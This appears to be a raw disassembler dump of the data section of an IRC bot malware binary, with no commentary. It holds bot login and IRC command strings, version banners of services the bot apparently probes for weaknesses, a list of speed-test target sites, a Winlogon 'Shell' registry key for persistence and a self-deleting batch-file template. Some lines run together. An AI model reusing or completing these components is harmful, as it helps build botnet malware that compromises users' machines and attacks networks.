aSh db '!* SH',0 ; DATA XREF: sub_4256BD+2B�o
align 4
aTopic_0 db 'TOPIC',0 ; DATA XREF: sub_4257C9+F7�o
align 4
aNotice db 'NOTICE',0 ; DATA XREF: sub_4257C9+E2�o
align 4
aUserhost db 'USERHOST',0 ; DATA XREF: sub_4257C9+CD�o
align 10h
aPing db 'PING',0 ; DATA XREF: sub_4257C9+B8�o
align 4
aPong db 'PONG',0 ; DATA XREF: sub_4257C9+A7�o
align 10h
aOper db 'OPER',0 ; DATA XREF: sub_4257C9+96�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_4257C9+85�o
align 10h
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_4257C9+74�o
aNowANetworkAdm db 'now a network administrator',0 ; DATA XREF: sub_4257C9+63�o
aIrcOperator db 'IRC Operator',0 ; DATA XREF: sub_4257C9+52�o
align 4
aPass_0 db 'PASS ',0 ; DATA XREF: sub_4257C9:loc_42580A�o
; sub_4258D5:loc_425938�o
align 4
aUser_1 db 'USER ',0 ; DATA XREF: sub_4258D5+4D�o
align 4
aMail db 'Mail',0 ; DATA XREF: sub_4258D5+3C�o
align 4
off_4506BC dd offset byte_4B4F2B ; DATA XREF: sub_4258D5+2B�o
a_bot_login db '_BOT_LOGIN',0 ; DATA XREF: sub_42594D:loc_42598E�o
align 4
a_bot db '_BOT',0 ; DATA XREF: sub_42594D+2B�o
align 4
aOpenssh_2 db 'OpenSSH_2',0 ; DATA XREF: sub_4259A3+63�o
align 10h
aServUFtpServer db 'Serv-U FTP Server',0 ; DATA XREF: sub_4259A3+52�o
align 4
aApache1_3 db 'Apache/1.3',0 ; DATA XREF: sub_4259A3:loc_4259E4�o
align 10h
aOpenssl0_9_6 db 'OpenSSL/0.9.6',0 ; DATA XREF: sub_4259A3+2B�o
align 10h
dword_450710 dd 6C755602h, 22F2F6EhaSDSDS db ' (%s:%d) -> (%s:%d) - "%s"',0
align 4
unk_450734 db 2 ; DATA XREF: sub_425A1B+2CA�o
db 50h, 48h, 50h
db 2Fh ; /
db 2Fh, 2, 20h
aSDSDS_0 db '(%s:%d) -> (%s:%d) - "%s"',0
align 4
unk_450758 db 2 ; DATA XREF: sub_425A1B+2A0�o
db 46h, 54h, 50h
db 2Fh ; /
db 2Fh, 2, 20h
aSDSDS_1 db '(%s:%d) -> (%s:%d) - "%s"',0
align 4
unk_45077C db 2 ; DATA XREF: sub_425A1B+276�o
db 49h, 52h, 43h
db 2Fh ; /
db 2Fh, 2, 20h
aSDSDS_2 db '(%s:%d) -> (%s:%d) - "%s"',0
align 10h
unk_4507A0 db 2 ; DATA XREF: sub_425A1B+249�o
db 42h, 6Fh, 74h
db 2Fh ; /
db 2Fh, 2, 20h
aSDSDS_3 db '(%s:%d) -> (%s:%d) - "%s"',0
align 4
aPostHttp1_1Hos db 'POST / HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_425D4F+E5�o
db 'Host: %s',0Dh,0Ah
db 'Content-Length: %d',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aSEuropeDKbitSU db '%s ~ Europe[%d kbit/s] ~ USA[%d kbit/s] ~ Asia[%d kbit/s] ~ Avera'
; DATA XREF: sub_425F31+275�o
db 'ge[%d kbit/s]',0
align 4
aWww_kaist_ac_k db 'www.kaist.ac.kr',0 ; DATA XREF: sub_425F31+14E�o
aWww_pku_edu_cn db 'www.pku.edu.cn',0 ; DATA XREF: sub_425F31+147�o
align 4
aWww_bandai_co_ db 'www.bandai.co.jp',0 ; DATA XREF: sub_425F31+140�o
align 4
aWww_seikoWatch db 'www.seiko-watch.co.jp',0 ; DATA XREF: sub_425F31+139�o
align 4
aWww_nintendo_0 db 'www.nintendo.co.jp',0 ; DATA XREF: sub_425F31+132�o
align 4
aWww_nthu_edu_t db 'www.nthu.edu.tw',0 ; DATA XREF: sub_425F31+12B�o
aWww_lib_nthu_e db 'www.lib.nthu.edu.tw',0 ; DATA XREF: sub_425F31+124�o
aWww_umin_ac_jp db 'www.umin.ac.jp',0 ; DATA XREF: sub_425F31+11D�o
align 4
aUnimelb_edu_au db 'unimelb.edu.au',0 ; DATA XREF: sub_425F31+116�o
align 4
aWww_conexim_co db 'www.conexim.com.au',0 ; DATA XREF: sub_425F31+10F�o
align 10h
aGamearena_com_ db 'gamearena.com.au',0 ; DATA XREF: sub_425F31+108�o
align 4
aWww_nintendo_c db 'www.nintendo.com',0 ; DATA XREF: sub_425F31+101�o
align 4
aWww_apple_com db 'www.apple.com',0 ; DATA XREF: sub_425F31+FA�o
align 4
aWww_easynews_c db 'www.easynews.com',0 ; DATA XREF: sub_425F31+F3�o
align 4
aWww_above_net db 'www.above.net',0 ; DATA XREF: sub_425F31+EC�o
align 4
aWww_level3_com db 'www.level3.com',0 ; DATA XREF: sub_425F31+E5�o
align 4
aWww_burst_net db 'www.burst.net',0 ; DATA XREF: sub_425F31+DE�o
align 4
aWww_cogentco_c db 'www.cogentco.com',0 ; DATA XREF: sub_425F31+D7�o
align 10h
aWww_rit_edu db 'www.rit.edu',0 ; DATA XREF: sub_425F31+D0�o
aWww_nocster_co db 'www.nocster.com',0 ; DATA XREF: sub_425F31+C9�o
aWww_stanford_e db 'www.stanford.edu',0 ; DATA XREF: sub_425F31+C2�o
align 10h
aWww_xo_net db 'www.xo.net',0 ; DATA XREF: sub_425F31+BB�o
align 4
aWww_google_com db 'www.google.com',0 ; DATA XREF: sub_425F31+B4�o
align 4
aWww_nintendoEu db 'www.nintendo-europe.com',0 ; DATA XREF: sub_425F31+AD�o
aWww_supergames db 'www.supergames.cz',0 ; DATA XREF: sub_425F31+A6�o
align 4
aWww_epfl_ch db 'www.epfl.ch',0 ; DATA XREF: sub_425F31+9F�o
aWww_hon_ch db 'www.hon.ch',0 ; DATA XREF: sub_425F31+98�o
align 10h
aWww_switch_ch db 'www.switch.ch',0 ; DATA XREF: sub_425F31+91�o
align 10h
aWww_1und1_de db 'www.1und1.de',0 ; DATA XREF: sub_425F31+8A�o
align 10h
aWww_rtv_de db 'www.rtv.de',0 ; DATA XREF: sub_425F31+83�o
align 4
aWww_rollingsto db 'www.rollingstone.de',0 ; DATA XREF: sub_425F31+7C�o
aWww_uniTuebing db 'www.uni-tuebingen.de',0 ; DATA XREF: sub_425F31+72�o
align 4
aWww_univAngers db 'www.univ-angers.fr',0 ; DATA XREF: sub_425F31+68�o
align 4
aVerio_fr db 'verio.fr',0 ; DATA XREF: sub_425F31+5E�o
align 4
aWww_volkskrant db 'www.volkskrant.nl',0 ; DATA XREF: sub_425F31+54�o
align 4
aWww_news_nl db 'www.news.nl',0 ; DATA XREF: sub_425F31+4A�o
aWww_utwente_nl db 'www.utwente.nl',0 ; DATA XREF: sub_425F31+40�o
align 4
aWww_schlund_ne db 'www.schlund.net',0 ; DATA XREF: sub_425F31+36�o
a0123456789abcd db '0123456789ABCDEFGHIJKLMNOPQRSTUVWXWYZabcdefghijklmnopqrstuvwxyz',0
; DATA XREF: sub_42625A+1D�o
a432 db '432',0 ; DATA XREF: sub_42630C+87�o
aSS_0 db '%s %s',0Ah,0 ; DATA XREF: sub_42630C+6B�o
; sub_42630C+C2�o ...
align 4
aSSSSMail_gmail db '%s %s',0Ah ; DATA XREF: sub_426402+101�o
db '%s %s "mail.gmail.com" "127.0.0.1" :%s',0Ah,0
align 8
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz1234567890-|`_\{[]}abcdefghijklmnopqrst'
; DATA XREF: sub_426698+C8�o
; sub_426698+180�r ...
db 'uvwxyz',0
aMirc32 db 'mIRC32',0 ; DATA XREF: sub_426B7C+1F�o
align 4
a0_0_0_0 db '0.0.0.0',0 ; DATA XREF: sub_427162+100�o
aSSSWithDPackS db '%s %s (%s) with (%d) pack(s)',0 ; DATA XREF: sub_4274B2+1AA�o
align 10h
aSoftwareMicr_5 db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0
; DATA XREF: sub_427728+25�o
align 4
aShell db 'Shell',0 ; DATA XREF: sub_427728+20�o
align 10h
a_2d_2d4d_2d_2d db '%.2d/%.2d/%4d, %.2d:%.2d %s',0 ; DATA XREF: sub_427AFB+6C�o
aAm db 'AM',0 ; DATA XREF: sub_427AFB+49�o
align 10h
aPm db 'PM',0 ; DATA XREF: sub_427AFB+3E�o
align 8
a@echoOffRepe_0 db '@echo off',0Dh,0Ah ; DATA XREF: sub_427BB8:loc_427C95�o
db ':Repeat',0Dh,0Ah
db 'del "%s">nul',0Dh,0Ah
db 'if exist "%s" goto Repeat',0Dh,0Ah
db 'del "%%0"',0Dh,0Ah,0
align 8
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_427BB8+D6�o
db ':Repeat',0Dh,0Ah
db 'del "%s">nul',0Dh,0Ah
db 'ping 127.0.0.1>nul',0Dh,0Ah
db 'if exist "%s" goto Repeat',0Dh,0Ah
db 'del "%%0"',0Dh,0Ah,0
align 4
aSSIIII_bat db '%s\%s%i%i%i%i.bat',0 ; DATA XREF: sub_427BB8+78�o
align 4
aExplorer_exe db 'Explorer.exe',0 ; DATA XREF: sub_427E97+93�o
align 4
a__ db '..',0 ; DATA XREF: sub_428046+AF�o
align 10h
a_ db '\*.*',0 ; DATA XREF: sub_428046+3B�o
align 4
aSFailedToConne db '%s Failed to connect to HTTP server.',0 ; DATA XREF: sub_42817F+1DE�o
align 10h
aSCouldNotOpenA db '%s Could not open a connection.',0 ; DATA XREF: sub_42817F+1D2�o
aSInvalidUrl_ db '%s Invalid URL.',0 ; DATA XREF: sub_42817F+1BD�o
align 4
aSFailedToGetRe db '%s Failed to get requested URL from HTTP server.',0
; DATA XREF: sub_42817F:loc_42832A�o
align 4
aSUrlVisited_ db '%s URL visited.',0 ; DATA XREF: sub_42817F+1A4�o
asc_450DB8 db '*/*',0 ; DATA XREF: sub_42817F+48�o
aSSPortsHitS db '%s %s, ports hit: (%s)',0 ; DATA XREF: sub_4283DC+3E�o
align 4
aSD db '%s%d ',0 ; DATA XREF: sub_428597+19D�o
align 10h
off_450DE0 dd offset off_4374BC ; DATA XREF: .text:off_437F80�o
; .text:00437FC4�o ...
align 8
a_?avlength_err db '.?AVlength_error@std@@',0
align 10h
dword_450E00 dd 0DF0B3D60h, 101B548Fh, 8658Eh, 19D12B2Bhoff_450E10 dd offset off_4374BC ; DATA XREF: .text:off_438058�o
; .text:00438094�o ...
align 8
a_?av_com_error db '.?AV_com_error@@',0
align 10h
dword_450E30 dd 1B3Fh align 10h
dd 9875h, 9873h
off_450E48 dd offset sub_42A8C0 ; DATA XREF: sub_430A37�r
off_450E4C dd offset nullsub_2 ; DATA XREF: sub_42AB28:loc_42AB6A�r
off_450E50 dd offset nullsub_2 ; DATA XREF: sub_42ABBB�r
dword_450E54 dd 19930520h, 6 dup(0) ; sub_42ACD2+2�o
dd offset sub_431FD0
align 10h
off_450E80 dd offset off_4374BC ; DATA XREF: .text:off_4380D0�o
; .text:0043810C�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
align 10h
off_450EA0 dd offset dword_677000 ; DATA XREF: sub_42BEB4�o
; sub_42C048+55�o ...
dd 0
dd offset dword_677000
dd 101h
dword_450EB0 dd 2 dup(0) dd 1000h, 0
dword_450EC0 dd 3 dup(0) ; sub_42DA95+50�o ...
dd 2, 1, 3 dup(0)
dword_450EE0 dd 3 dup(0) ; sub_42DA95+58�o ...
dd 2 dup(2), 7 dup(0)
dword_450F10 dd 7Ch dup(0) dword_451100 dd 8 dup(0) ; sub_42C156+D�o
off_451120 dd offset sub_430A75 ; DATA XREF: sub_42C048+69�o
; sub_42C5AC+1C�r
dword_451124 dd 2 ; sub_43228A+34�r ...
dd 10h, 0
off_451130 dd offset off_451130 ; DATA XREF: sub_42D329+D�o
; sub_42D329+69�o ...
off_451134 dd offset off_451130 ; DATA XREF: sub_42D329:loc_42D3A9�r
; sub_42D329+89�w ...
dd offset dword_451148
dd offset dword_451148
dword_451140 dd 0FFFFFFFFh ; sub_42D46D:loc_42D4BA�w
dd 0FFFFFFFFh
dword_451148 dd 0F0h, 0F1h, 800h dup(0) ; .text:0045113C�o
off_453150 dd offset off_451130 ; DATA XREF: sub_42D46D+15�r
; sub_42D46D+20�w ...
dword_453154 dd 1E0h ; sub_42B2CA+A7�r ...
dword_453158 dd 0 ; sub_42DA80+6�r
off_45315C dd offset dword_676920 ; DATA XREF: sub_42D9F6+1F�r
dd 7 dup(0)
off_45317C dd offset dword_676950 ; DATA XREF: sub_42D9F6+17�r
dd 3 dup(0)
off_45318C dd offset dword_676968 ; DATA XREF: sub_42D9F6+F�r
dd 3 dup(0)
off_45319C dd offset dword_676938 ; DATA XREF: sub_42D9F6+7�r
dd 7 dup(0)
dd 0B42798h, 16h dup(0)
off_453218 dd offset aNull_0 ; DATA XREF: sub_42DBAD:loc_42DF11�r
; sub_42DBAD+457�r
; "(null)"
off_45321C dd offset aNull ; DATA XREF: sub_42DBAD+259�r
; "(null)"
dword_453220 dd 0Bh ; sub_42E3B7+F�w ...
dword_453224 dd 0D2D0920h, 5Dhdword_45322C dd 5Dh dword_453230 dd 1 dword_453234 dd 16h dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
off_453398 dd offset word_4533A2 ; DATA XREF: sub_429D89:loc_429DB9�r
; sub_429D89:loc_429E76�r ...
dd offset word_4533A2
db 2 dup(0)
word_4533A2 dw 20h ; DATA XREF: sub_434C6F+18�r
; .text:off_453398�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_4535A4 dd 1 ; sub_429D89:loc_429E5E�r ...
byte_4535A8 db 2Eh ; DATA XREF: sub_42E525:loc_42E819�r
; sub_42E525+311�r ...
align 4
dd 1
dword_4535B0 dd 0FFFFFFFFh, 0A00h, 8 dup(0) ; sub_42F312:loc_42F396�o
dword_4535D8 dd 14h off_4535DC dd offset dword_437620 ; DATA XREF: sub_43015E:loc_43017B�r
dd 1Dh, 43761Ch, 1Ah, 437618h, 1Bh, 437610h, 1Fh, 437608h
dd 13h, 437600h, 21h, 4375F8h, 0Eh, 4375F0h, 0Dh, 4375E8h
dd 0Fh, 4375E0h, 10h, 4375D8h, 5, 4375D0h, 1Eh, 4375CCh
dd 12h, 4375C8h, 20h, 4375C4h, 0Ch, 4375BCh, 0Bh, 4375B4h
dd 15h, 4375ACh, 1Ch, 4375A4h, 19h, 43759Ch, 11h, 437594h
dd 18h, 43758Ch, 16h, 437584h, 17h, 43757Ch, 22h, 437578h
dd 23h, 437574h, 24h, 437570h
dbl_4536B0 dq 1.797693134862316e308 ; DATA XREF: sub_42FE97+B7�r
; sub_42FE97:loc_42FF7E�r ...
dd 0
dd 0FFF80000h
dbl_4536C0 dq 1.797693134862316e308 ; DATA XREF: sub_42FE97+92�r
; sub_42FE97:loc_42FF56�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_4536D8 dt 2.3562723457267347066e313 ; DATA XREF: sub_430346+D�r
; sub_430346+1F�r
align 4
tbyte_4536E4 dt 1.9149954921904370718e-1233 ; DATA XREF: sub_430346+31�r
align 10h
dd 2 dup(43h), 20h dup(0)
dd 43h, 20h dup(0)
off_4537FC dd offset sub_4309C1 ; DATA XREF: sub_42A8D8+F�w
; sub_42DBAD+3AA�r
off_453800 dd offset sub_43066B ; DATA XREF: sub_42A8D8+5�w
; sub_42DBAD+3E2�r
off_453804 dd offset sub_4306D1 ; DATA XREF: sub_42A8D8+14�w
; sub_42E525+430�r
off_453808 dd offset sub_430611 ; DATA XREF: sub_42A8D8+1E�w
; sub_42DBAD+3CB�r
off_45380C dd offset sub_4306B9 ; DATA XREF: sub_42A8D8+28�w
off_453810 dd offset sub_4309C1 ; DATA XREF: sub_42A8D8+32�w
align 8
dword_453818 dd 0C0000005h, 0Bh, 0 ; sub_42E485+7B�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_453890 dd 3 ; sub_430B57+86�r ...
dword_453894 dd 7 ; sub_430B57+8C�r ...
dd 78h
dword_45389C dd 0Ah ; sub_4350D3+4�r
off_4538A0 dd offset a_cmd ; DATA XREF: sub_431058+109�o
; ".cmd"
dd offset a_bat ; ".bat"
dd offset a_exe ; ".exe"
off_4538AC dd offset a_com ; DATA XREF: sub_431058+E7�o
; ".com"
dd offset sub_431FD0
align 10h
off_4538C0 dd offset sub_431AFC ; DATA XREF: sub_431B5D+29�r
off_4538C4 dd offset aNoError ; DATA XREF: sub_42BE29:loc_42BE86�r
; "No error"
dd offset aOperationNotPe ; "Operation not permitted"
dd offset aNoSuchFileOrDi ; "No such file or directory"
dd offset aNoSuchProcess ; "No such process"
dd offset aInterruptedFun ; "Interrupted function call"
dd offset aInputOutputErr ; "Input/output error"
dd offset aNoSuchDeviceOr ; "No such device or address"
dd offset aArgListTooLong ; "Arg list too long"
dd offset aExecFormatErro ; "Exec format error"
dd offset aBadFileDescrip ; "Bad file descriptor"
dd offset aNoChildProcess ; "No child processes"
dd offset aResourceTempor ; "Resource temporarily unavailable"
dd offset aNotEnoughSpace ; "Not enough space"
dd offset aPermissionDeni ; "Permission denied"
dd offset aBadAddress ; "Bad address"
dd offset aUnknownError ; "Unknown error"
dd offset aResourceDevice ; "Resource device"
dd offset aFileExists ; "File exists"
dd offset aImproperLink ; "Improper link"
dd offset aNoSuchDevice ; "No such device"
dd offset aNotADirectory ; "Not a directory"
dd offset aIsADirectory ; "Is a directory"
dd offset aInvalidArgumen ; "Invalid argument"
dd offset aTooManyOpenF_0 ; "Too many open files in system"
dd offset aTooManyOpenFil ; "Too many open files"
dd offset aInappropriateI ; "Inappropriate I/O control operation"
dd offset aUnknownError ; "Unknown error"
dd offset aFileTooLarge ; "File too large"
dd offset aNoSpaceLeftOnD ; "No space left on device"
dd offset aInvalidSeek ; "Invalid seek"
dd offset aReadOnlyFileSy ; "Read-only file system"
dd offset aTooManyLinks ; "Too many links"
dd offset aBrokenPipe ; "Broken pipe"
dd offset aDomainError ; "Domain error"
dd offset aResultTooLarge ; "Result too large"
dd offset aUnknownError ; "Unknown error"
dd offset aResourceDeadlo ; "Resource deadlock avoided"
dd offset aUnknownError ; "Unknown error"
dd offset aFilenameTooLon ; "Filename too long"
dd offset aNoLocksAvailab ; "No locks available"
dd offset aFunctionNotImp ; "Function not implemented"
dd offset aDirectoryNotEm ; "Directory not empty"
dd offset aIllegalByteSeq ; "Illegal byte sequence"
dd offset aUnknownError ; "Unknown error"
dword_453974 dd 2Bh ; sub_42BE29:loc_42BE81�r
byte_453978 db 1 ; DATA XREF: sub_4325F8+ED�r
db 2, 4, 8
align 10h
dword_453980 dd 3A4h dword_453984 dd 82798260h, 21h, 0dword_453990 dd 0DFA6h align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_453A70 dd 2 ; sub_432FD0+E�o ...
off_453A74 dd offset aR6002FloatingP ; DATA XREF: sub_432FD0+FC�r
; sub_432FD0+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 437CD4h, 9, 437CA8h, 0Ah, 437C84h, 10h, 437C58h
dd 11h, 437C28h, 12h, 437C04h, 13h, 437BD8h, 18h, 437BA0h
dd 19h, 437B78h, 1Ah, 437B40h, 1Bh, 437B08h, 1Ch, 437AE0h
dd 78h, 437AD0h, 79h, 437AC0h, 7Ah, 437AB0h, 0FCh, 4476B0h
dd 0FFh, 437AA0h
dword_453B00 dd 2694h ; sub_42FB4C+46�r ...
dword_453B04 dd 7080h ; sub_4338E9+75�w ...
dword_453B08 dd 1 ; sub_4338E9+A2�w ...
dword_453B0C dd 0FFFFF1F0h ; sub_4338E9+AB�w ...
off_453B10 dd offset dword_545350 ; DATA XREF: .text:off_453B90�o
dd 0Fh dup(0)
off_453B50 dd offset dword_544450 ; DATA XREF: .text:off_453B94�o
dd 0Fh dup(0)
off_453B90 dd offset off_453B10 ; DATA XREF: sub_4338E9+D0�r
; sub_4338E9+EF�r ...
off_453B94 dd offset off_453B50 ; DATA XREF: sub_4338E9+109�r
; sub_4338E9+130�r ...
dword_453B98 dd 0FFFFFFFFh ; sub_433B91+1E�r ...
dword_453B9C dd 0 ; sub_433D3D+BF�w
dword_453BA0 dd 0 ; sub_433D3D+E0�w
align 8
dword_453BA8 dd 0FFFFFFFFh ; sub_433B91+26�r ...
dword_453BAC dd 0 ; sub_433D3D+EA�w ...
dword_453BB0 dd 0 ; sub_433D3D+23�r ...
dword_453BB4 dd 0FFFFFFFFh dd 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h, 111h, 130h
dd 14Eh
dword_453BE4 dd 16Dh ; sub_433D3D+2E�r ...
dword_453BE8 dd 0FFFFFFFFh dd 1Eh, 3Ah, 59h, 77h, 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh
dd 14Dh, 16Ch, 0
dword_453C20 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFhdword_453C38 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh, 2, 453C58h, 437F14h
; DATA XREF: sub_4343DC�o
dd 437F10h, 437F0Ch, 437F08h, 437F04h, 437F00h, 437EFCh
dd 437EF4h, 437EECh, 437EE4h, 437ED8h, 437ECCh, 437EC4h
dd 437EB8h, 437EB4h, 437EB0h, 437EACh, 437EA8h, 437EA4h
dd 437EA0h, 437E9Ch, 437E98h, 437E94h, 437E90h, 437E8Ch
dd 437E88h, 437E80h, 437E74h, 437E6Ch, 437E64h, 437EA4h
dd 437E5Ch, 437E54h, 437E4Ch, 437E40h, 437E38h, 437E2Ch
dd 437E20h, 450C2Ch, 450C30h, 437E18h, 437E04h, 437DFCh
dd 0
dword_453D08 dd 2Eh, 0 dd offset dword_453D08
dd offset dword_676C50
dd offset dword_676C50
dd offset dword_676C50
dd offset dword_676C50
dd offset dword_676C50
dd offset dword_676C50
dd offset dword_676C50
dd offset dword_676C50
dd offset dword_676C50
dd 2 dup(7F7F7F7Fh), 453D10h, 3 dup(0)
dword_453D50 dd 2 dup(0) dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
; ---------------------------------------------------------------------------
push eax
retn
; ---------------------------------------------------------------------------
dw 400Fh
dd 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_453EB0 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_436184+1B�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 0
dword_454010 dd 2 dup(0) word_454018 dw 0 ; DATA XREF: sub_401136+13�o
; sub_407FFA+2F�r ...
align 10h
dword_454020 dd 0 ; sub_402BA8+9�w
dword_454024 dd 0 ; sub_402BA8+21�r
dword_454028 dd 0 ; sub_402BA8+2E�r
dd 23h dup(0)
dword_4540B8 dd 0 ; sub_40221C+92�w ...
dword_4540BC dd 0 ; sub_40242A+19A�r ...
dd 198h dup(0)
dword_454720 dd 3 dup(0) dword_45472C dd 6 dup(0) ; sub_40242A+201�o ...
dword_454744 dd 3 dup(0) dword_454750 dd 0 dword_454754 dd 41h dup(0) dword_454858 dd 41h dup(0) dword_45495C dd 0 ; sub_4020AA+FE�r
dword_454960 dd 0 dword_454964 dd 0 ; sub_4020AA+BE�r
dword_454968 dd 23h dup(0) dword_4549F4 dd 0 ; sub_4020AA:loc_4021C9�r
dword_4549F8 dd 0 dword_4549FC dd 0 ; sub_402CBA+8F�r ...
dword_454A00 dd 4 dup(0) dword_454A10 dd 0 ; sub_402CBA+58�w ...
dword_454A14 dd 0 ; resolved to->NTDLL.RtlInitUnicodeString ; sub_4027F3+35�r ...
dword_454A18 dd 0 ; resolved to->NTDLL.ZwOpenSection ; sub_402900+62�r ...
dword_454A1C dd 0 ; sub_4027F3+2D�r ...
dword_454A20 dd 0 ; sub_4029DF�r ...
dword_454A24 dd 0 ; sub_402900+7F�r ...
dword_454A28 dd 0 ; sub_40A938+5F2B�w ...
dword_454A2C dd 0 ; sub_40A938+2231�w ...
dword_454A30 dd 0 ; sub_402CBA:loc_40315F�r ...
byte_454A34 db 0 ; DATA XREF: sub_401E8E+37�r
; sub_4053EE+8E�o ...
align 4
dword_454A38 dd 20h dup(0) ; sub_40363C+14�o
dword_454AB8 dd 0 ; sub_4066B3+43�w
align 10h
dword_454AC0 dd 6 dup(0) ; sub_4066B3+314�o ...
dword_454AD8 dd 0 ; sub_4066B3+3C9�o
dword_454ADC dd 0 ; sub_4066B3+3D5�o
dword_454AE0 dd 0 ; sub_4066B3+3E6�o
dword_454AE4 dd 0 ; sub_4066B3+3F5�o
dword_454AE8 dd 0 ; sub_4066B3+401�o
dword_454AEC dd 0 ; sub_4066B3+411�o
dword_454AF0 dd 0 ; sub_4066B3+41D�o
dword_454AF4 dd 0 ; sub_4066B3+42D�o
dword_454AF8 dd 0B2h dup(0) ; sub_4066B3+441�o
